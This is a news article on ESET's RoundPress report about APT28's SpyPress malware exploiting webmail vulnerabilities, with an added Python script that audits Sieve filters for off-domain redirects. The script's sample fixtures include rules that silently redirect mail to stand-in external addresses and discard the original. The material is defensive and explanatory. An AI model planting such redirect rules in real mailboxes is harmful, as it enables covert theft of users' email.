Russia-Connected SpyPress Malware Targets Webmail to Monitor Ukraine

ESET has reported on RoundPress, an advanced cyber espionage initiative conducted by Russia’s Fancy Bear (Sednit), targeting organizations associated with Ukraine through vulnerabilities in webmail systems and deploying SpyPress malware.

Cybersecurity experts at ESET have unveiled a complex cyber espionage campaign, dubbed RoundPress, with “medium confidence” attribution to the Russian-backed Sednit group, also known as APT28 or Fancy Bear. This operation specifically aims at entities related to the ongoing conflict in Ukraine, intent on stealing sensitive data via compromised webmail servers, particularly RoundCube.

The Sednit group has gained notoriety for its involvement in significant cyber incidents, such as the 2016 Democratic National Committee hack, and its recent activities have been documented in attacks against entities like TV5Monde and WADA. In the context of RoundPress, the group utilizes targeted spear-phishing techniques to lure victims into executing malicious JavaScript code, known as SpyPress, which is embedded in emails.

Exploiting Known and Zero-Day Vulnerabilities in Webmail Systems

In a recent publication by ESET, researchers highlighted a trend over the last two years in which espionage groups have increasingly targeted webmail servers such as Roundcube and Zimbra for email theft, capitalizing on outdated installations and known vulnerabilities. As of 2023, Sednit was observed exploiting CVE-2020-35730 in Roundcube, but by 2024 its focus had extended to vulnerabilities in other platforms, including:

- Horde;
- Zimbra, particularly CVE-2024-27443, which was patched on March 1, 2024;
- MDaemon, which faced a zero-day vulnerability, CVE-2024-11182, reported on November 1, 2024, with a patch released shortly afterward.

Compromise Chain (Source: ESET)

On September 29, 2023, ESET noted a specific incident involving a spear-phishing email sent from katecohen1984@portugalmail.pt, which exploited CVE-2023-43770 in Roundcube. Such emails often masquerade as news items to entice recipients, including a message sent to a Ukrainian target on September 11, 2024, from kyivinfo24@ukr.net discussing an alleged arrest in Kharkiv.

The primary targets of Operation RoundPress identified through ESET telemetry include Ukrainian government entities and defense contractors based in Bulgaria and Romania, some of which manufacture Soviet-era weaponry for Ukraine. Furthermore, the campaign has extended its reach to national governmental bodies in Greece, Cameroon, Ecuador, Serbia, and various companies in Ukraine related to telecommunications and civil air transport.

The variants of SpyPress malware, including SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA, exhibit similar obfuscation techniques while communicating with command and control servers through HTTP POST requests. Their functionalities vary significantly, with SpyPress.ROUNDCUBE capable of manipulating email Sieve rules to redirect incoming messages to an attacker-controlled address, and SpyPress.MDAEMON able to generate App Passwords for continuous access.
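The Sieve-rule manipulation attributed above to SpyPress.ROUNDCUBE leaves a durable artifact on the mail server: a filter rule that redirects incoming mail to an address outside the organization. The following script, an added example written for this article and not code from ESET, Roundcube or Dovecot, audits Sieve scripts for exactly that pattern. It assumes the scripts can be read as text (Dovecot stores one per mailbox), that the organization's own mail domains are known, and that a `:copy` redirect or a trailing `discard` deserves extra attention because either keeps the mailbox owner from noticing anything; the domains, user names and sample scripts are constructed for the demonstration.

```python
"""Audit Sieve filter scripts for redirect rules that send mail off-domain.

Added example, not code from ESET, Roundcube or Dovecot. It assumes Sieve
scripts can be read as text (Dovecot stores them per user as files) and
that the organisation's own mail domains are known. The sample scripts
below are constructed for the demonstration.
"""
import re
from dataclasses import dataclass

# Constructed: addresses at these domains are considered internal.
TRUSTED_DOMAINS = {"example.org", "mail.example.org"}

# Strip '#' line comments and '/* */' block comments before matching.
# Simplification: a '#' inside a quoted string would also be stripped.
COMMENT_RE = re.compile(r"#[^\n]*|/\*.*?\*/", re.S)

# The Sieve 'redirect' action (RFC 5228), with optional tagged arguments
# such as ':copy' (RFC 3894), followed by the quoted destination address.
REDIRECT_RE = re.compile(r'\bredirect\b((?:\s+:\w+)*)\s+"([^"]+)"\s*;')

# A 'discard' after the redirect drops the original message.
DISCARD_RE = re.compile(r"\bdiscard\s*;")


@dataclass
class Finding:
    user: str
    target: str
    silent_copy: bool       # ':copy' keeps the mail in the inbox, so nothing looks odd
    original_dropped: bool  # a later 'discard' hides the message from the user
    rule: str               # the matched redirect statement, for the ticket


def audit_sieve(user: str, script: str, trusted=TRUSTED_DOMAINS) -> list[Finding]:
    """Return one Finding per redirect whose destination is outside `trusted`."""
    body = COMMENT_RE.sub("", script)
    findings = []
    for m in REDIRECT_RE.finditer(body):
        tags, target = m.group(1), m.group(2)
        domain = target.rpartition("@")[2].lower()
        if domain in trusted:
            continue  # internal forwarding is business as usual
        findings.append(Finding(
            user=user,
            target=target,
            silent_copy=":copy" in tags,
            # Heuristic: any discard later in the script, not only in this rule.
            original_dropped=DISCARD_RE.search(body, m.end()) is not None,
            rule=m.group(0),
        ))
    return findings


def audit_all(scripts: dict[str, str]) -> list[Finding]:
    """Run the audit over a {user: script} mapping, e.g. one script per mailbox."""
    out = []
    for user, script in scripts.items():
        out.extend(audit_sieve(user, script))
    return out


# Constructed sample scripts: a benign folder rule, an internal forward,
# a silent external copy, and an external redirect that discards the original.
SAMPLE_SCRIPTS = {
    "alice": 'require ["fileinto"];\n'
             '# newsletters go to a folder\n'
             'if header :contains "subject" "newsletter" { fileinto "News"; }\n',
    "carol": 'require ["fileinto"];\n'
             'if address :is "from" "boss@example.org" '
             '{ redirect "carol@mail.example.org"; fileinto "Boss"; }\n',
    "bob":   'require ["copy"];\n'
             '/* added 2024-09-11 */\n'
             'if true { redirect :copy "collector@external.example"; }\n',
    "dave":  'if header :contains "subject" "invoice" '
             '{ redirect "drop@external.example"; discard; }\n',
}

if __name__ == "__main__":
    for f in audit_all(SAMPLE_SCRIPTS):
        flags = []
        if f.silent_copy:
            flags.append("silent :copy")
        if f.original_dropped:
            flags.append("original discarded")
        print(f"{f.user}: redirect to {f.target} [{', '.join(flags) or 'plain'}] -> {f.rule}")
```

Run against real mailboxes, the audit would be scheduled and its findings diffed against the previous run, so that a redirect rule appearing on a mailbox that never had one is what raises the alert; the `:copy` and `discard` flags only help prioritise, since a user who still receives their mail has no reason to open the filter settings and notice the rule.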

In summary, the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the critical need for organizations to implement timely patches and comprehensive security measures. The techniques employed align with several MITRE ATT&CK tactics, including initial access through spear-phishing, persistence via backdoors, and credential access through password manipulation, highlighting the multi-faceted approach these adversaries take in executing their campaigns.

J Stephen Kowski, Field CTO at SlashNext Email Security, remarked on these developments, noting the capacity for hackers to swiftly refocus their efforts once they exploit weaknesses in widely used email platforms. He emphasized that both commercial and self-hosted email systems carry risks, thus necessitating regular updates and expert maintenance to ensure security.

To mitigate risks effectively, Kowski advocates for continuous updates and patches for email systems, the implementation of robust security measures such as multi-factor authentication, and the use of advanced tools to detect and block phishing attempts before they reach end-users.
